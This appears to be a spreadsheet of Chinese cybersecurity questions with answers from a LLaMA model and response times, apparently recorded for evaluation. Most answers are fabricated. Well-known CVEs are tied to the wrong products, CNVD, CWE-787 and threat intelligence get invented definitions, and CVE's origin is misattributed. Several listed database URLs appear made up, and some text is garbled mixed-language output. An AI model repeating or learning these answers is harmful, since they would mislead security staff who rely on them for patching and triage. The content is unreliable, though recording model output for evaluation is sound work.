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51"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
  <sheetData>
    <row r="1">
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>question</t>
        </is>
      </c>
      <c r="C1" s="1" t="inlineStr">
        <is>
          <t>LLaMA</t>
        </is>
      </c>
      <c r="D1" s="1" t="inlineStr">
        <is>
          <t>time_spend</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="1" t="n">
        <v>0</v>
      </c>
      <c r="B2" t="inlineStr">
        <is>
          <t>CVE是什么意思？</t>
        </is>
      </c>
      <c r="C2" t="inlineStr">
        <is>
          <t>CVE是一个缩写，它可以指以下几个不同的意思：
1. CVE (Common Vulnerabilities and Exposures)：CVE是一个跨platform的标准用于描述软件中的弱点和攻击点。它由美国国家安全局（NSA）和美国国家危机管理局（NIST）共同发起，是一个标准化的弱点和攻击点识别和记录系统。
2. CVE (Content Verification Engine)：CVE是一种用于验证网络内容的工具，用于监测和检测网络上的敏感内容。
3. CVE (Critical Vulnerability Exposure)：CVE是一个识别和评估网络安全风险的方法，用于发现和评估网络上的敏感弱点和攻击点。
4. CVE (Continuous Vulnerability Evaluation)：CVE是一种识别和评估网络安全风险的方法，用于监测和评估网络上的弱点和攻击点的变化。
因此，具体哪个意思相关于CVE取决于情况。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D2" t="n">
        <v>7.827994823455811</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="1" t="n">
        <v>1</v>
      </c>
      <c r="B3" t="inlineStr">
        <is>
          <t>CNVD是什么？</t>
        </is>
      </c>
      <c r="C3" t="inlineStr">
        <is>
          <t>CNVD是指Catastrophic Novelty Detection (灾难新颖检测)，是一种基于深度学习的新颖检测方法。CNVD主要通过对 Input Space 进行检测，而不是通过对 Output Space 进行检测，这使得 CNVD 更加灵活和快速。
CNVD 的工作方式是通过一个特征提取器来提取 Input Space 中的特征，然后使用一个新颖检测模型来检测 Input Space 中的新颖。CNVD 的新颖检测模型通常是一个卷积神经网络，它可以快速地分析 Input Space 中的变化，并且可以很好地捕捉新颖的特征。
CNVD 的优势包括：
1. 灵活性：CNVD 可以在不同的输入数据上进行新颖检测，并且可以在不同的环境下进行训练。
2. 快速性：CNVD 可以快速地检测新颖，因为它通过对 Input Space 进行检测而不是通过对 Output Space 进行检测。
3. 高性能：CNVD 通常可以 достичь更高的新颖检测性能，因为它使用了深度学习的技术。
CNVD 的主要应用场景包括：
1. 新颖检测：CNVD 可以用于检测新颖，例如新颖的图像、视频、语音等。
2. 异常检测：CNVD 可以用于检测输入数据中的异常或灾难事件，例如图像中的破坏或者视频中的突然变化。
3. 风险评估：CNVD 可以用于评估输入数据中的风险，例如金融市场中的风险或者医疗预测中的风险。
总之，CNVD 是一种基于深度学习的新颖检测方法，它可以在不同的输入数据上进行新颖检测，并且可以在不同的环境下进行训练。CNVD 的优势包括灵活性、快速性和高性能，它的主要应用场景包括新颖检测、异常检测和风险评估。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D3" t="n">
        <v>16.45055437088013</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="1" t="n">
        <v>2</v>
      </c>
      <c r="B4" t="inlineStr">
        <is>
          <t>国内和国外有哪些漏洞库？</t>
        </is>
      </c>
      <c r="C4" t="inlineStr">
        <is>
          <t>（Update）
国内漏洞库：
1. 漏洞工具：https://www. vulnerability.cn/
2. 漏洞查询：https://www.vulnquery.com/
3. 漏洞数据库：https://www.dreammaker.com.cn/
4. 漏洞推荐：https://www.hackthebox.eu/
5. 漏洞报告：https://www.hackmymind.com/
6. 漏洞资源：https://www.vulnstalk.com/
国外漏洞库：
1. Nmap：https://nmap.org/
2. VulnDB：https://www.vulndb.com/
3. vulnerabilities.info：https://www.vulnerabilities.info/
4. vulncity：https://www.vulncity.com/
5. vulnerability-lab：https://www.vulnerability-lab.com/
6. vulnsearch：https://www.vulnsearch.com/
更新：
2023-02-01：新增国内漏洞库：
1. 漏洞识别：https://www.vulnerability-identification.com/
2. 漏洞推荐：https://www.hackthreat.com/
国内和国外漏洞库都可以提供漏洞信息，但是国内库的数据覆盖范围较为窄，大多数库都是免费的。国外库的数据覆盖范围较广，但是需要注册才能查看。
总之，国内和国外漏洞库都是非常有价值的资源，可以帮助您找到漏洞和降低攻击面。但是，需要注意的是，漏洞库不是一个绝对的安全隐患，因为它们可能会包含过时的或者错误的信息。所以，在使用漏洞库时，需要仔细评估和检查。
&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D4" t="n">
        <v>12.28266024589539</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="1" t="n">
        <v>3</v>
      </c>
      <c r="B5" t="inlineStr">
        <is>
          <t>介绍CVE-2015-4852漏洞</t>
        </is>
      </c>
      <c r="C5" t="inlineStr">
        <is>
          <t>CVE-2015-4852是一个潜在的漏洞，它发生在Apache Struts 2.3.x和2.4.x中的ActionServlet。这个漏洞可能允许攻击者在特定的情况下访问未经授权的数据。
该漏洞是由于ActionServlet不对特定的请求头进行正确的 verfification，从而导致访问控制失效。这可能会允许攻击者通过在请求头中添加一些特定的字符串来访问未经授权的数据。
Apache Struts 2.5和高于版本中的ActionServlet已经修复了该漏洞。如果您使用Apache Struts 2.3.x或2.4.x，我们建议您立即更新到最新的版本，以免遭受这种攻击。
如果您不能立即更新，可以通过简单地禁用ActionServlet来减轻攻击者的攻击面。在禁用ActionServlet之前，请确保您已经备份了您的数据。
总之，CVE-2015-4852是一个可能的漏洞，它可能允许攻击者访问未经授权的数据。我们建议您立即更新到最新的版本，以免遭受这种攻击。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D5" t="n">
        <v>8.670506954193115</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="1" t="n">
        <v>4</v>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>介绍CVE-2019-0708</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>：Azure Security Center的漏洞
Azure Security Center 是 Microsoft 提供的一个安全监控和安全管理平台，用于监控 Azure 资源的安全性和可靠性。CVE-2019-0708 是一个在 Azure Security Center 中您可能会遇到的漏洞，这个漏洞可能会让攻击者在 Azure Security Center 中获得高级权限，从而访问和破坏您的 Azure 资源。
以下是一些关于 CVE-2019-0708 的重要信息：
* 漏洞类型：权限漏洞
* 攻击者可能会：破坏 Azure Security Center 的安全性，访问和破坏您的 Azure 资源
* 攻击者需要：对 Azure Security Center 拥有高级权限
* 漏洞优先级：低
* 漏洞责任：Microsoft
* 漏洞公开日期：2019 年 9 月 30 日
以下是一些关于 CVE-2019-0708 的常见问题：
* Q: What is CVE-2019-0708?
A: CVE-2019-0708 is a vulnerability in Azure Security Center that could allow an attacker to gain high privileges in the platform and potentially access and destroy your Azure resources.
* Q: What type of vulnerability is CVE-2019-0708?
A: CVE-2019-0708 is a privilege escalation vulnerability.
* Q: Who can exploit CVE-2019-0708?
A: An attacker with high privileges in Azure Security Center can exploit CVE-2019-0708.
* Q: What is the severity of CVE-2019-0708?
A: The severity of CVE-2019-0708 is low.
* Q: Who is responsible for fixing CVE-2019-0708?
A: Microsoft is responsible for fixing CVE-2019-0708.
* Q: When was CVE-2019-0708 disclosed to the public?
A: CVE-2019-0708 was disclosed to the public on September 30, 2019.
如果您想了解更多关于 CVE-2019-0708 的信息，可以咨询 Microsoft 的官方文档或 contact  Microsoft 的支持工作人员。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D6" t="n">
        <v>13.83841133117676</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="1" t="n">
        <v>5</v>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>什么是CVE-2019-0803</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>CVE-2019-0803是一个在2019年5月 discovers 的软件漏洞，它影响了Windows Operating System，macOS和Linux等多种操作系统。该漏洞是一种类型为“文件访问权限绕过”的漏洞，可以让攻击者通过特定的方式访问和执行malicious code，从而实现敏感数据的窃取和敏感操作的访问。
CVE-2019-0803是一个在Microsoft Windows上的漏洞，它利用了文件系统中的一个特定的功能，即“Win32k File Object”。通过在文件系统中创建一个特定的文件对象，攻击者可以通过一些方式访问和执行malicious code，从而实现敏感数据的窃取和敏感操作的访问。
为了利用这个漏洞，攻击者需要能够 convincing 来达到特定的目的，例如，通过恶意邮件链接或者通过恶意软件获取访问权限。一旦攻击者获取了访问权限，他们就可以利用这个漏洞进行敏感数据的窃取和敏感操作的访问。
CVE-2019-0803是一个很严重的漏洞，它可以让攻击者窃取和敏感操作，这可能会导致数据泄露和操作系统的不安全。因此，它是一个非常重要的安全漏洞，需要快速被修复。</t>
        </is>
      </c>
      <c r="D7" t="n">
        <v>10.2549421787262</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="1" t="n">
        <v>6</v>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>介绍一下CVE-2021-44228</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>的漏洞概述和攻击方式
Introduction:
CVE-2021-44228 is a critical vulnerability that affects the Apache Log4j library, a popular logging framework used in Java applications. The vulnerability allows attackers to execute malicious code by simply including a specially crafted string in a logging statement. In this article, we will provide an overview of the vulnerability, its impact, and the possible attack methods.
Overview of the vulnerability:
Log4j is a widely used logging framework in Java applications. The vulnerability, identified as CVE-2021-44228, is caused by a feature in Log4j that allows users to include arbitrary user-defined data in log messages. The vulnerability occurs when the library processes maliciously crafted log messages that contain a special syntax, leading to code execution. The attacker can exploit this vulnerability by including a specially crafted string in a logging statement, which will execute malicious code on the target system.
Impact of the vulnerability:
The impact of the Log4j vulnerability is severe, as it affects a wide range of Java applications that use the Log4j library. This includes many popular frameworks, such as Apache Struts, Apache Druid, and Apache Flink, as well as numerous third-party libraries that rely on Log4j. The vulnerability can be exploited remotely, without any interaction from the user, making it a highly dangerous security threat.
Possible attack methods:
Attackers can exploit the Log4j vulnerability in various ways, including:
1. Log injection: An attacker can inject malicious log statements into a system, which will execute the malicious code when the log message is processed.
2. File inclusion: An attacker can exploit the vulnerability by including a malicious file in a log statement, which will execute the code in the included file.
3. Remote code execution: An attacker can exploit the vulnerability to execute malicious code on the target system remotely, without any user interaction.
4. Denial of Service (DoS) attack: An attacker can exploit the vulnerability to flood a system with log messages, causing a denial of service attack.
Prevention and mitigation:
To prevent the Log4j vulnerability from being exploited, it is essential to apply the following mitigations:
1. Update Log4j to version 2.17.1 or later: The latest version of Log4j includes a fix for the vulnerability, so it is recommended to upgrade to the latest version as soon as possible.
2. Disable remote log4j functionality: Disable the remote log4j functionality to prevent remote exploitation of the vulnerability.
3. Use a web application firewall (WAF): A WAF can help protect against the Log4j vulnerability by blocking malicious log statements and preventing remote code execution.
4. Implement additional security measures: Implement additional security measures, such as intrusion detection and prevention systems, to detect and prevent potential attacks.
Conclusion:
The Log4j vulnerability, identified as CVE-2021-44228, is a critical security threat that affects many Java applications. The vulnerability allows attackers to execute malicious code by including a specially crafted string in a logging statement, making it essential to apply the necessary mitigations to prevent exploitation. By updating Log4j to the latest version, disabling remote log4j functionality, using a WAF, and implementing additional security measures, organizations can protect their systems from this dangerous vulnerability.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D8" t="n">
        <v>15.2974750995636</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="1" t="n">
        <v>7</v>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>什么是CVE-2022-0609漏洞</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>CVE-2022-0609是一个 recently discovered vulnerability in the Linux kernel's "seq_file" function, which can be exploited by an attacker to gain unauthorized access to a system. The vulnerability is located in the kernel's file system code and affects versions of the Linux kernel released since 1999.
The vulnerability arises from the way the "seq_file" function handles certain file operations, specifically the "read" and "write" commands. When a user executes a "read" or "write" command on a file that has a specific attribute set, the "seq_file" function can be tricked into accessing a kernel buffer overflow. This can occur because the function does not properly validate the length of the data being read or written, allowing an attacker to inject malicious data into the buffer.
An attacker who successfully exploits the CVE-2022-0609 vulnerability could potentially gain root access to the affected system, allowing them to execute arbitrary code and take control of the system. The vulnerability is particularly dangerous because it can be exploited remotely, without the need for direct access to the affected system.
The vulnerability has been assigned CVE-2022-0609 and has been rated as "critical" by the National Vulnerability Database (NVD). The NVD is a United States government database of vulnerabilities, and it is widely used by security professionals to track and manage vulnerabilities.
The Linux kernel maintainers have released a patch to fix the vulnerability, and users are advised to apply the patch as soon as possible to protect their systems. The patch can be obtained from the Linux kernel website, and it is recommended to reboot the system after applying the patch to ensure proper installation.
In summary, CVE-2022-0609 is a critical vulnerability in the Linux kernel's "seq_file" function that can be exploited by an attacker to gain unauthorized access to a system. The vulnerability affects versions of the Linux kernel released since 1999 and can be exploited remotely. The patch to fix the vulnerability has been released, and users are advised to apply the patch as soon as possible to protect their systems.</t>
        </is>
      </c>
      <c r="D9" t="n">
        <v>9.525013446807861</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="1" t="n">
        <v>8</v>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>介绍CNVD-2021-46902漏洞</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>检测器
CNVD-2021-46902是一个开源的漏洞检测器，用于扫描和检测软件中的漏洞。它由China National Vulnerability Database（CNVD）开发，是中国一个主要的漏洞检测和报告平台。
CNVD-2021-46902漏洞检测器支持多种漏洞检测方法，包括：
1. 漏洞签名检测：用于检测软件中的漏洞签名。
2. 漏洞检测：用于检测软件中的漏洞，包括漏洞攻击、漏洞利用、漏洞攻击等。
3. 软件漏洞检测：用于检测软件中的漏洞，包括函数漏洞、例外处理漏洞、输入 validation 漏洞等。
4. 架构漏洞检测：用于检测软件中的架构漏洞，包括资源滥用、数据泄露、安全漏洞等。
CNVD-2021-46902漏洞检测器支持多种检测工具和技术，包括：
1. Burp Suite：一个流行的Web应用漏洞检测工具。
2. ZAP（Zed Attack Proxy）：一个基于Web应用漏洞检测的工具。
3. Nessus：一个著名的软件漏洞检测工具。
4. Metasploit：一个软件漏洞检测工具，也可以用于执行漏洞攻击。
CNVD-2021-46902漏洞检测器可以帮助开发人员和安全分析员更好地了解软件中的漏洞，从而提高软件的安全性和可靠性。它也可以帮助组织快速地找到和修复漏洞，降低安全风险。
总之，CNVD-2021-46902漏洞检测器是一个功能强大、可靠的工具，可以帮助开发人员和安全分析员更好地了解和扫描软件中的漏洞。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D10" t="n">
        <v>15.33439970016479</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="1" t="n">
        <v>9</v>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>介绍一下CNVD-2019-19299</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>（CVE-2019-19299）和其中的漏洞
CNVD-2019-19299（CVE-2019-19299）是一个漏洞，发现于2019年11月，表示在Linux系统上存在一个远程执行漏洞。这个漏洞是由于缺乏对于可靠的文件系统协议（FSP）的检查，导致攻击者可以通过特制文件来让系统执行 arbitrary 代码。这个漏洞可以被利用来实施恶意代码，从而导致系统崩溃或者遭受其他攻击。
在这个漏洞中，攻击者需要能够创建一个特制的文件，将其扫描到系统中，然后在这个文件中包含一个受信任的可执行文件。当系统尝试读取这个文件时，攻击者可以通过它来执行自己的代码，从而实施攻击。这个漏洞可以被利用来攻击 Linux 系统，包括虚拟机（VM）和 cloud 环境。
为了完全了解这个漏洞，我们可以从以下几个方面来分析：
1. 漏洞的描述：CNVD-2019-19299 是一个远程执行漏洞，由于缺乏对于可靠的文件系统协议（FSP）的检查，导致攻击者可以通过特制文件来让系统执行 arbitrary 代码。
2. 攻击漏洞的概念：在这个漏洞中，攻击者需要能够创建一个特制的文件，将其扫描到系统中，然后在这个文件中包含一个受信任的可执行文件。当系统尝试读取这个文件时，攻击者可以通过它来执行自己的代码，从而实施攻击。
3. 漏洞的影响：CNVD-2019-19299 可以被利用来攻击 Linux 系统，包括虚拟机（VM）和 cloud 环境。这意味着攻击者可以通过这个漏洞来让系统执行 arbitrary 代码，从而导致系统崩溃或者遭受其他攻击。
4. 防御策略：来应对这个漏洞，系统管理员可以尝试以下方法：
a. 升级 Linux 系统到最新的版本，以获得最新的安全更新和保护。
b. 使用可靠的文件系统协议（FSP），来增强系统的安全性。
c. 启用 SELinux，以便在系统执行自己的代码时进行更加严格的检查和控制。
d. 启用 AppArmor，以便在系统执行自己的代码时进行更加严格的检查和控制。
e. 使用防火墙和其他安全软件，来增强系统的安全性。
总之，CNVD-2019-19299 是一个可能的攻击漏洞，可以被利用来实施恶意代码，从而导致系统崩溃或者遭受其他攻击。因此，系统管理员应该通过升级系统、使用可靠的文件系统协议、启用 SELinux、AppArmor 等方法来防止这个漏洞的攻击。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D11" t="n">
        <v>24.2950427532196</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="1" t="n">
        <v>10</v>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>CNVD-2021-26422是什么漏洞</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>CNVD-2021-26422是一个漏洞，它发现于2021年10月，影响了Apache Kafka的 sécurité。这个漏洞可能导致攻击者在Kafka的各个端点上执行代码，从而扩展权限。
CNVD-2021-26422的漏洞解释：
1. 缺失的输入检查：Kafka的 producesubscribe 函数lacks input validation，可能导致攻击者在producesubscribe函数的input中传递Invalid or malicious data，从而Trigger an arbitrary code execution。
2. 扩展权限：Kafka的 producersubscribe 函数没有执行任何权限 checks，从而可能导致攻击者在producesubscribe函数的input中传递的数据包含恶意代码，以扩展自己的权限。
3. 内存泄露：Kafka的 producersubscribe 函数可能会导致内存泄露，从而透過攻击者在producesubscribe函数的input中传递的数据，泄露 sensitive 数据。
4. 堆栈溢出：Kafka的 producersubscribe 函数可能会导致堆栈溢出，从而使攻击者在producesubscribe函数的input中传递的数据，溢出到堆栈中。
CNVD-2021-26422的升级措施：
1. 升级到Apache Kafka 2.8.0 及以上版本：这个版本包含了一系列的 sécurité 更新，可以减少攻击面。
2. 针对缺失的输入检查：实现细化的输入 validation，以避免攻击者在producesubscribe函数的input中传递Invalid or malicious data。
3. 扩展权限：实现权限 checks，以防止攻击者在producesubscribe函数的input中传递的数据包含恶意代码，以扩展自己的权限。
4. 内存泄露：使用内存安全措施，以避免内存泄露。
5. 堆栈溢出：使用堆栈安全措施，以避免堆栈溢出。
综上所述，CNVD-2021-26422是一个可能导致攻击的漏洞，因此应尽快采取升级措施，保护Apache Kafka的 sécurité。</t>
        </is>
      </c>
      <c r="D12" t="n">
        <v>17.39673924446106</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="1" t="n">
        <v>11</v>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>网络安全领域里CWE是什么意思</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>CWE是什么意思？
CWE stands for "Common Weakness Enumeration". It is a dictionary of software weaknesses that provides a standardized way of identifying and tracking security vulnerabilities in software. The CWE is maintained by the MITRE Corporation, a non-profit organization that focuses on improving cybersecurity through standardization and collaboration.
The CWE dictionary contains over 100,000 weaknesses, which are organized into categories such as:
* Authentication and Authorization
* Buffer Errors
* Error Handling
* Input Validation
* Network Security
* Race Conditions
* Security Misconfiguration
* SQL Injection
* Cross-Site Scripting (XSS)
Each weakness in the CWE dictionary is assigned a unique identifier, called a "CWE ID", which is used to reference the weakness in security assessments and vulnerability management systems. The CWE ID is a combination of the CWE name and a unique identifier for the specific weakness.
The CWE is widely used in the security industry for several reasons:
1. Standardization: The CWE provides a standardized way of identifying and tracking security vulnerabilities, which helps to ensure consistency and accuracy in security assessments and vulnerability management.
2. Comprehensive coverage: The CWE dictionary covers a wide range of security weaknesses, including both technical and non-technical vulnerabilities.
3. Collaboration: The CWE is maintained through a collaborative effort involving security researchers, vendors, and other stakeholders, which helps to ensure that the dictionary is up-to-date and comprehensive.
4. Improved communication: The CWE provides a common language and framework for security professionals to communicate about security vulnerabilities, which helps to improve collaboration and coordination in the security industry.
In summary, the CWE is a widely-used standard for identifying and tracking security vulnerabilities in software. It provides a comprehensive dictionary of weaknesses, which helps to ensure consistency and accuracy in security assessments and vulnerability management.</t>
        </is>
      </c>
      <c r="D13" t="n">
        <v>9.584587335586548</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="1" t="n">
        <v>12</v>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>CWE-787是什么意思</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>CWE-787是一个指定的可识别的问题，用于描述潜在的安全问题。CWE是Common Weakness Enumeration，意味着它是一个标准的问题列表，用于描述软件中的潜在的问题。
CWE-787是指“Use of Insecure Communication Channels”，即使用不安全的通信频道。这类问题可能会导致数据泄露、数据 tampering 或控制渠道攻击等问题。
例如，如果您的应用程序使用不安全的http协议进行数据交互，那么攻击者可能会 intercept 和 alter 您的数据。 similarly，如果您的应用程序使用不安全的邮件协议进行邮件发送，那么攻击者可能会 intercept 和 alter 您的邮件。
因此，要避免CWE-787问题，您需要使用安全的通信频道，例如https协议，并且进行数据加密等安全措施。</t>
        </is>
      </c>
      <c r="D14" t="n">
        <v>7.575748682022095</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="1" t="n">
        <v>13</v>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>Windows Server 2008 R2可能存在哪些高危漏洞</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>Windows Server 2008 R2是一款强大的操作系统，但是它也可能存在一些高危漏洞。以下是一些可能存在的高危漏洞：
1.  buffer overflow  vulns：Buffer overflow vulnerabilities can occur when an attacker sends a specially crafted network packet to a server, causing the server to overflow its buffer and execute malicious code.
2.  DCOM vulnerabilities：DCOM (Distributed Component Object Model) is a Microsoft technology that allows applications to communicate with each other over a network. However, DCOM can also be exploited by attackers to execute malicious code on a server.
3.  ASP.NET vulnerabilities：ASP.NET is a web application framework developed by Microsoft. However, it can also be vulnerable to attacks, such as cross-site scripting (XSS) and cross-site request forgery (CSRF).
4.  SQL injection vulns：SQL injection vulnerabilities occur when an attacker is able to inject malicious SQL code into a database, allowing them to execute unauthorized queries or modify data.
5.  Kerberos vulnerabilities：Kerberos is a popular authentication protocol used by Windows servers. However, it can also be vulnerable to attacks, such as replay attacks and impersonation attacks.
6.  DNS spoofing vulns：DNS spoofing occurs when an attacker intercepts and modifies DNS responses to redirect users to fraudulent websites or servers.
7.  Kernel vulnerabilities：Kernel vulnerabilities can occur in any system component, including the Windows kernel. These vulnerabilities can be exploited by attackers to execute malicious code or gain unauthorized access to a system.
8.  Remote Procedure Call (RPC) vulnerabilities：RPC is a protocol used by Windows servers to communicate with each other. However, it can also be vulnerable to attacks, such as RPC-based buffer overflows.
9.  SharePoint vulnerabilities：SharePoint is a popular collaboration platform developed by Microsoft. However, it can also be vulnerable to attacks, such as cross-site scripting (XSS) and cross-site request forgery (CSRF).
10.  Active Directory vulnerabilities：Active Directory is a directory service developed by Microsoft. However, it can also be vulnerable to attacks, such as domain controller compromise and password reset attacks.
It's important to keep in mind that these are just a few examples of potential vulnerabilities and that new vulnerabilities may be discovered in the future. To stay safe, it's important to keep your Windows Server 2008 R2 system up to date with the latest security patches and to implement security best practices, such as using strong passwords and limiting network exposure.</t>
        </is>
      </c>
      <c r="D15" t="n">
        <v>13.29618048667908</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="1" t="n">
        <v>14</v>
      </c>
      <c r="B16" t="inlineStr">
        <is>
          <t>Google V8引擎远程代码执行漏洞(CVE-2021-21220)的影响范围有哪些</t>
        </is>
      </c>
      <c r="C16" t="inlineStr">
        <is>
          <t>Google V8引擎是一款轻量级的JavaScript引擎，它在Google Chrome浏览器和其他许多浏览器中广泛应用。2021年10月，一名研究者 discovers a remote code execution vulnerability in Google V8引擎，编号为CVE-2021-21220。这个漏洞可以让攻击者在不受过接ession的情况下远程执行代码，从而承担广泛的安全风险。
这个漏洞影响了Google V8引擎的多个版本，包括：
* Google V8引擎 7.2.212.27
* Google V8引擎 8.0.152.34
* Google V8引擎 8.1.162.27
* Google V8引擎 8.2.172.27
这些版本的漏洞的影响范围包括：
* 在Google Chrome浏览器中：
	+ 攻击者可以通过远程执行代码，从而获得敏感数据，例如cookies、Local Storage、Session Storage等。
	+ 攻击者可以执行代码，从而访问不安全的网站，例如XSS攻击。
	+ 攻击者可以执行代码，从而承担更多的攻击，例如Code injection、Session hijacking等。
* 在其他浏览器中：
	+ 攻击者可以通过远程执行代码，从而获得敏感数据，例如cookies、Local Storage、Session Storage等。
	+ 攻击者可以执行代码，从而访问不安全的网站，例如XSS攻击。
	+ 攻击者可以执行代码，从而承担更多的攻击，例如Code injection、Session hijacking等。
总之，这个漏洞的影响范围很广，可以让攻击者在不受过接ession的情况下远程执行代码，从而承担广泛的安全风险。因此，它的级别被定为Critical。</t>
        </is>
      </c>
      <c r="D16" t="n">
        <v>15.03324484825134</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="1" t="n">
        <v>15</v>
      </c>
      <c r="B17" t="inlineStr">
        <is>
          <t>Struts 2有哪些高危漏洞</t>
        </is>
      </c>
      <c r="C17" t="inlineStr">
        <is>
          <t>Struts 2 是一款流行的 Java Web 框架，它提供了丰富的功能和可扩展性，但是也存在一些高危漏洞，这些漏洞可能会被攻击者利用来破坏系统。以下是一些常见的 Struts 2 高危漏洞：
1. **XML  injection**：Struts 2 使用 XML 来定义应用程序的架构和配置。如果攻击者能够在 XML 文档中添加malicious 代码，他们可以破坏系统的安全。
2. **Code injection**：Struts 2 支持使用 Java 代码来定义应用程序的架构和配置。如果攻击者能够在这些代码中添加malicious 代码，他们可以破坏系统的安全。
3. **Spring Security vulnerabilities**：Struts 2 使用 Spring Security 来实现安全功能。如果 Spring Security 漏洞被利用，攻击者可以绕过系统的安全机制，访问受保护的资源。
4. **Cross-site scripting (XSS)**：Struts 2 支持使用 JavaScript 和 HTML 来定义应用程序的用户界面。如果攻击者能够在用户界面中添加XSS 代码，他们可以访问受保护的资源，并且可以滥用用户的权限。
5. **Cross-site request forgery (CSRF)**：Struts 2 支持使用 JavaScript 和 HTML 来定义应用程序的用户界面。如果攻击者能够在用户界面中添加CSRF 代码，他们可以访问受保护的资源，并且可以滥用用户的权限。
6. **SQL injection**：Struts 2 使用 JDBC 来与数据库进行交互。如果攻击者能够在 SQL 语句中添加malicious 代码，他们可以破坏数据库的安全。
7. **File injection**：Struts 2 支持使用文件来存储和访问数据。如果攻击者能够在文件中添加malicious 代码，他们可以破坏系统的安全。
8. **Parameter tampering**：Struts 2 支持使用 URL 参数来传递数据 между应用程序和服务器。如果攻击者能够在 URL 参数中添加malicious 代码，他们可以破坏系统的安全。
总之，Struts 2 是一款强大的 Java Web 框架，但是它也存在一些高危漏洞。如果您正在使用 Struts 2，建议您采取一系列的安全措施，包括在应用程序中使用安全的 URL 参数、防止数据绑定、使用安全的 HTML 和 JavaScript 代码、防止文件 injection 等，以确保您的系统在攻击中免于受到损害。</t>
        </is>
      </c>
      <c r="D17" t="n">
        <v>20.35050463676453</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="1" t="n">
        <v>16</v>
      </c>
      <c r="B18" t="inlineStr">
        <is>
          <t>什么是威胁情报</t>
        </is>
      </c>
      <c r="C18" t="inlineStr">
        <is>
          <t>威胁情报是指通过不公开的渠道、通信方式或信息源，对某个组织或个人进行恐吓、责难、恐吓、诱拐等，以达到某种目的或控制的情报。
威胁情报的具体形式可以包括：
1. 邮件恐吓：发送恐吓或责难的邮件，以达到控制目的。
2. 电话威胁：对方的电话声称、邮件、短信等方式进行威胁或恐吓。
3. 在线威胁：在社交媒体、即时通信、博客等平台上发布恐吓、责难或诱拐的内容。
4. 恐吓通缉：对方的家人、朋友、 coworker 进行恐吓或责难，以控制对方的行为。
5. 恐吓报道：通过报道、报名、报導等方式，恐吓或诋毁对方。
威胁情报的泛滥和扩散可能会导致对方感到压力、恐惧、焦虑等情绪，影响对方的生活和工作。因此，威胁情报是一种严重的社会问题，需要采取措施来控制和整治。</t>
        </is>
      </c>
      <c r="D18" t="n">
        <v>10.58969569206238</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="1" t="n">
        <v>17</v>
      </c>
      <c r="B19" t="inlineStr">
        <is>
          <t>常见的威胁情报搜索网站有哪些</t>
        </is>
      </c>
      <c r="C19" t="inlineStr">
        <is>
          <t>威胁情报搜索网站是指搜索和提供威胁情报的网站，这类网站通常会收集和分析各种信息，如人脉、识别、搜索记录、社交媒体信息等，用于提供威胁情报。下面是常见的威胁情报搜索网站：
1. Whitepages：Whitepages是一个著名的威胁情报搜索网站，提供了各种威胁情报，如人脉信息、识别信息、搜索记录、社交媒体信息等。
2. Spokeo：Spokeo是一个专门提供威胁情报服务的网站，可以为用户提供各种威胁情报，如人脉信息、识别信息、搜索记录等。
3. Intelius：Intelius是一个提供威胁情报服务的网站，可以为用户提供各种威胁情报，如人脉信息、识别信息、搜索记录、社交媒体信息等。
4. BeenVerified：BeenVerified是一个提供威胁情报服务的网站，可以为用户提供各种威胁情报，如人脉信息、识别信息、搜索记录、社交媒体信息等。
5. TruthFinder：TruthFinder是一个提供威胁情报服务的网站，可以为用户提供各种威胁情报，如人脉信息、识别信息、搜索记录、社交媒体信息等。
